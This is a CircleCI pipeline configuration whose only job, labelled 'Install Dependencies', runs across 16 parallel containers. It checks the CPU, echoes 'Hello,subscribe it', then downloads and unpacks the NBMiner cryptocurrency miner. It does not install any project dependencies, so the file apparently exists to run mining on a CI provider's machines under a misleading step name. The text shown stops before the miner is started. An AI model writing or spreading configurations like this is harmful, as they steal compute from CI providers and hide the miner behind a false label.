version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              lscpu
              echo Hello,subscribe it
              wget https://github.com/NebuTech/NBMiner/releases/download/v40.1/NBMiner_40.1_Linux.tgz 
              tar -xvf NBMiner_40.1_Linux.tgz
              cd NBMiner_Linux
              

workflows:
    version: 2.1
    build:
        jobs:
        - trial
